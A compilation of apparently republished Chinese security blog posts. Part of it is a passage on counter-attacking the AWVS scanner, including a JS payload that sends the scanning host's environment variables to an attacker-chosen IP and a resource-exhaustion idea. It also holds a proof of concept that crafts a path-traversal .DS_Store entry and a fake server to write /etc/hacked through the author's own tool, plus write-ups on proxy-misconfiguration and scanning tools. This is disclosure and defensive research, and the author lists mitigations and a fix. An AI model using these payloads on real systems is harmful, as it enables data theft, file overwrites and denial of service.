笔者在测试时，尝试写入了大量的URL到单个js，发现仅有一部分URL被请求了，导致这个问题的原因，可能是因为插件超时限制，出现timeout，或者是因为队列的大小限制被主动丢弃了。但解决方法也比较简单，把你想请求的目标URL，拆分后写入多个js文件即可。例如每个js中只写1个C段。

反制：获取扫描主机信息

笔者未能测试成功，原因在于acorn是纯Parser，不支持执行、不能关联上下文。会被AWVS添加执行的只有特定白名单中的请求和参数。一个思路，是寄希望于扫描引擎能支持embeded expression，也就是拼接 $(process.env.USER) 这样的字符串给扫描器。本地测试可行，acorn解析完成，node确实将信息带入了

let acorn = require("acorn");s = `$(xxx).ready(function(){$.get("http://10.1.1.1/?user=${process.env.USERNAME}&os=${process.env.OS}");});`;ast = acorn.parse(s);if (ast){  processAst(ast);}

如上图所示，USER 、 OS、 COMPUTERNAME等环境变量中的信息，都是可以被带回，传到我们指定的接口的。然而在投给AWVS后，发现嵌入的表达式并未被解释器替换。

如上图所示，表达式未被替换，此路暂时不通。可能的原因是安全限制，因为笔者写入的参数${1+1}同样没有被正常替换为数字2.

反制：拒绝服务攻击

AWVS用到的acorn版本较低（代码中显示为2.6.5），未发现正则表达式DOS的漏洞。

一个思路，笔者尝试写了一个包含大量请求的js文件（16000个，仅数百kb），扫描器在处理这个JS的时候，出现内存占用的问题，单个目标跑到了2.6GB左右。如果使用普通浏览器打开页面，则是没有问题的，因为js是构造的，会立即抛出异常。因此，多写入几个这样的无效JS，就可以让扫描器陷入无尽的资源空耗。

除此之外，利用扫描器大量地请求AWVS监听在本地3443端口的web服务或其他本地HTTP服务，也是一个潜在的攻击点，笔者未进行测试。

总结

本文介绍了AWVS扫描器Javascript_AST_Parse.script插件的逻辑，以及可能被用于反制的利用点。因为JS解释器限制，可控的输入太少，当前效果还比较局限。有兴趣的同学可以进一步研究其利用手法。开发考虑对该插件做以下处理：

• 限制该插件在处理单个JS时最多可添加的HTTP请求个数

• 限制执行递归查找的次数和递归层级

• 限制只允许添加目标为同一个 域 *.target.com 或者同一个网段下的请求

• 由扫描框架，控制好单个插件的超时和最大执行次数

• 由扫描组件，持续监视自身资源占用，必要时放弃退出

扫描器使用者考虑做以下处理：

• 确保只在容器、虚机安装使用扫描器

• 网络隔离，对上述虚拟环境，限制其能够访问的内网IP段

• 对该插件进行前文所述的修改后再使用，或者临时先禁用

• 对于资源占用异常的扫描进程，考虑直接kill，放弃该目标

阅读原文

跳转微信打开

利用MisConfig HTTP Proxy Scanner发现配置不当的HTTP网关（正反向代理），突破边界访问企业内网应用

• 错误配置的外网反向代理，内网系统被意外暴露到外网

• 错误配置的外网正向代理，攻击者可以暴力枚举内网域名，访问内网的生产运维系统、办公系统

本项目地址：

如何使用

扫描器主界面

1. 已知部分解析到内网10.x.x.x 192.168.x.x的企业域名，直接填入这些域名
   
2. 已知该企业使用private DNS Zone，外网无法其获取解析关系，可以使用字典暴力枚举。 比如 www.google.internal，这个域名只在目标公司内部可解析，则填入Zone，选取字典组合即可。如图下图所示

配置Private DNS Zone暴力破解

该域名在外网无法解析

扫描结果界面

利用扫描结果配置hosts，内网系统便可以访问了：

我们知道，有互联网公司在内网办公系统，使用了特殊的*.oa.com域名。从fofa/shodan/zoomeye等平台，捞出来Headers中出现跳转 *.oa.com内网域名的IP地址，挂上字典扫一下。就可以发现存在漏洞的网关，直接穿透外网，访问其内网办公系统：

内网办公系统

写在最后

有了上述扫描结果，配置好hosts，就可以挂扫描器了。内网应用一般较为脆弱，没有经过严格的安全加固和渗透测试。挖到高危漏洞的几率远远大于一般外网应用。

本工具开发时间仓促，测试不充分，功能还不成熟。已知有误报问题待优化。

近来写代码实在太少，手生了。原本以为几个小时就能写完的工具，连续写了几天到12点。当然，主要是画界面生疏了，80%的时间在处理GUI。:)

阅读原文

跳转微信打开

EasyPen是使用Python + wxPython编写、提供简洁图形界面、支持跨平台的安全扫描工具，可用于企业内外网巡检、应急响应。

最初计划写EasyPen这个工具，是因为笔者认为

• 单机性能已经非常强大，哪怕是在家庭网络下，发包速率也非常可观

• 一般漏洞的应急，在已具备资产发现能力的情况下，写十几行代码扫全网，应该可以非常快，几分钟或者几十分钟就可以完成上万服务的扫描

• 提供一个简单的图形化工具，给白帽子或者安全团队内部同事使用。平时本机验证一下漏洞比较方便，不用各个脚本切来切去

  
  

EasyPen是使用Python + wxPython编写、提供简洁图形界面、支持跨平台的安全扫描工具，可用于企业内外网巡检、应急响应。

在线文档：https://easypen.lijiejie.com

它的主要功能包括：

• 资产发现：域名、IP、端口、服务等

• 漏洞扫描：基于AsyncIO实现的扫描框架，内置超过100个漏洞检测插件，支持调度Hydra/Medusa/Ncrack等工具扫描常见弱口令

• 应急响应：高危漏洞爆发后，依托框架和现成资产库，通常只需要编写十余行检测逻辑代码，就可以在几分钟内完成对数千目标的扫描

• 集成了多个漏洞利用工具

  
  

  

  扫描界面

  

  漏洞工具界面

  
  

  功能特性
  

  
  

• 本工具使用AsyncIO实现了高并发扫描，扫描核心是单线程的，并发扫描任务可超过1000个

• 本工具优化了DNS Log 检测方法，扫描器维护域名映射关系表，因此，无论扫描过程中投递过多少个子域名，最终都只需要最多2个HTTP请求验证。另外，由于DNS Log在传递链路上的触发需要一定时间，因此，把查询验证放到最后，也消除了不必要的等待，降低漏报的可能性

• 本工具提供易用的图形界面，通过关键词筛选目标（例如服务、端口号、IP等），即可立即发起大范围扫描

• 本工具支持多种输入格式，支持输入 10.1.1.1/16  10.1.1.2/10:80 www.lijiejie.com/31 等目标发起检测

  
  

安装使用

如果是Windows用户，并且希望绕过繁琐的安装步骤。则可以下载笔者已经生成的exe文件。下载直接运行其中的 EasyPen.exe 即可

https://github.com/lijiejie/EasyPen/releases/tag/alpha1.0.0

为了能够完整使用扫描器，还需要配置好DNS Log地址，域名列表等。请参考用户文档。

开发计划

目前Alpha 1.0 只完成了基础的框架，待开发完善的功能

• 适配支持各种类型的DNSLog平台

• 集成web指纹识别功能，标签功能（Server / Shiro / PHP / Java 等），可视化预览

• 维护预置扫描模板（插件集合名称）

• 添加第三方插件的执行支持，如：python / YAML 插件，支持复用其他开源项目插件

• 简易插件编辑和调试功能

• 漏洞查看界面一键复核验证功能（漏洞依然存在则高亮显示）

• 优化暴力破解相关，包括字典维护

• BBScan插件的集成

• 扫描性能持续提升

• 重构代码便于其他贡献者增加工具、插件

在这里感谢CEO Lake2的监督指导，下方是他的公众号。关注有钱人的公众号，窥探上流社会的思潮和生活，就在 "朴实无华lake2"。

阅读原文

跳转微信打开

BBScan 是一个高并发、轻量级的信息泄露扫描工具。它可以在短时间内完成数十万目标的扫描

BBScan 是一个高并发、轻量级的信息泄露扫描工具。

它可以在短时间内完成数十万目标的扫描，帮助渗透工程师从大量没有标签的主机中，定位到可能存在弱点的目标，进行下一步半自动化测试，或者是开启重量级扫描器。可以作为一个轻量级插件，集成到自动化扫描系统中。

BBScan最早是我7年前写的一个小工具，用来批量扫信息泄露的。项目地址：

https://github.com/lijiejie/BBScan

其维护价值不算太高，但不维护又稍微可惜。

以前经常会使用，比如应急的时候，写一行简单的规则到txt，就可以几分钟内扫完几万个目标。后因我很少挖漏洞，就没有再更新过了。

最近因为内部扫描器迭代更新，将原先几个组件都重写了。主要是python3 + asyncio的改造，去掉了多进程。

有兴趣的同学可以试试这个版本。把需要扫描的目标写入urls.txt，执行

python BBScan.py -f urls.txt

如果是少量目标，可以在命令行指定

python BBScan.py --host http://test.com http://test2.com

扫描特定的规则，通过 --rule 参数指定即可

python BBScan.py --rule test_page.txt --host http://test.com

扫描特定python插件，通过--script参数指定即可

python BBScan.py --script outlook_web_app.py   --host mail.demo.com

其他的一些参数，用户可以自行探索。查看help doc

python BBScan.py

不知道人生有多少个7年。BBScan这个小工具，能更新2.0也是意料之外的。

祝各位白帽子挖到高危漏洞。  

项目地址：  https://github.com/lijiejie/BBScan

阅读原文

跳转微信打开

本文介绍了分析构造带攻击意图的.DS_Store文件、并且利用任意文件写入漏洞的思路和方法。漏洞的利用需要一定条件，比如，这里web服务器需要能够处理非法的path

前些日子，一个名叫Justin Steven的安全研究人员，向我报告了一个漏洞。他提到，Git信息泄露利用工具GitHack在解析.git/index写入文件的时候，没有检查路径是否非法，导致有意图的攻击者，可以构造恶意的文件路径和文件内容，达到任意文件写入的效果。最终可能实现："反黑那个试图攻击你的黑客"。随后，我添加了几行检查路径的代码，修复了这个问题。见：

https://github.com/lijiejie/GitHack/commit/a3d70b19f29d2f624dcae17762022edf7464cee1

这个漏洞的出现，是因为攻击者可以修改文件路径，添加类似".."跨目录字符，实现穿越到任意路径。那么，问题来了，之前自己写的信息泄露利用工具不止一个。其他工具也会处理文件名/路径，是不是也有类似的问题呢？经过简单的验证，确实发现了问题。这里，我的测试项目是 https://github.com/lijiejie/ds_store_exp

 .DS_Store和ds_store_exp

.DS_Store是Mac OS保存文件夹自定义属性的隐藏文件，保存了一些基本信息，例如，文件的图标信息。如果开发运维将.DS_Store上传到web站点，被攻击者下载，黑客通过解析.DS_Store，可以得到该文件夹下的文件清单。它的效果基本等同于 "服务器开启目录浏览" 。

ds_store_exp是对应的利用工具，它下载解析.DS_Store，并且尝试遍历下载所有文件到本地。

 构造生成.DS_Store文件

这一步相对难度较高，直接去分析文件结构不现实。思路2种：

第一种，是直接去找一个现成的.DS_Store，通过二进制文档编辑器直接编辑字符串。这里我打开一个看一眼

excelTemplate是我已知的路径，在这里，可以观察到每个字符占2个byte。经过查阅文档，这里是utf-16编码的。

https://metacpan.org/dist/Mac-Finder-DSStore/view/DSStoreFormat.pod#Records

当然可以编辑，不过很费劲，因为，必须得是big-endian UTF-16编码，而且长度不能变。前面你还有个字段是长度，得改长度。

第二种方法，看看能不能现成的lib构造一个文件。在参考

https://github.com/al45tair/ds_store

代码实现后，我构造创建了一个带非法路径的文件

from ds_store import DSStore, DSStoreEntryfrom ds_store.store import ILocCodec

d = DSStore.open('.DS_Store', 'w+')new_entry = DSStoreEntry('../../../../../../../../etc/hacked', b'Iloc', ILocCodec, value=(282, 104))d.insert(new_entry)d.flush()d.close()

验证漏洞

现在将这个"带攻击意图" 的.DS_Store放到web目录下，使用ds_store_exp工具验证是否触发

git clone https://github.com/lijiejie/ds_store_exp.git# 切换到漏洞版本，是的，我已经提交了修复后的代码git checkout 784eada6cd08739032b7fdc124a8c93abcb0c2f7pip2 install ds_store

尝试执行，会发现确实工具请求了非法的路径，但是新的问题也出现了

注意到，因为常见的web server在接收到 .. 这样的invalid path后，会返回400。所以，这个问题被利用的可能性会更低一些。工具只有在返回200的时候才会写入文件。

为了验证利用效果，这里再写一个web server吧 ...  还好，在Python的世界，应该是20行代码的事情。

import http.serverimport socketserver

class MyHandler(http.server.SimpleHTTPRequestHandler):    def do_GET(self):        if self.requestline.find('..') < 0:            return super(MyHandler, self).do_GET()        else:            self.send_response(200)            self.send_header("Content-type", "plain/text")            self.end_headers()            self.wfile.write(b"hacked, man")

httpd = socketserver.TCPServer(("", 8001), MyHandler)httpd.serve_forever()

启动web服务，再次验证

如上图所示， 观察到 /etc/hacked已经写入成功了。

至此，通过分析自己的小工具，成功"黑掉了自己"。   :)

写在最后

本文介绍了分析构造带攻击意图的.DS_Store文件、并且利用任意文件写入漏洞的思路和方法。漏洞的利用需要一定条件，比如，这里web服务器需要能够处理非法的path ../../../../../../../../etc/hacked 

漏洞修复的代码已经提交， 之前下载过的同学可以git pull更新一下代码。

https://github.com/lijiejie/ds_store_exp

阅读原文

跳转微信打开